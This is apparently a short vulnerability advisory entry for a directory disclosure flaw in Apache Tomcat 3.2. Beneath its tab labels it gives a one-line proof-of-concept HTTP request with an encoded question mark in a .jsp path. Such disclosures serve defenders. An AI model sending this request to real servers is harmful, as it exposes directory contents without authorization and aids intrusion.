• info
• discussion
• exploit
• solution
• references

Apache Tomcat 3.2 Directory Disclosure Vulnerability

The following proof of concept was provided:

GET /%3F.jsp HTTP/1.0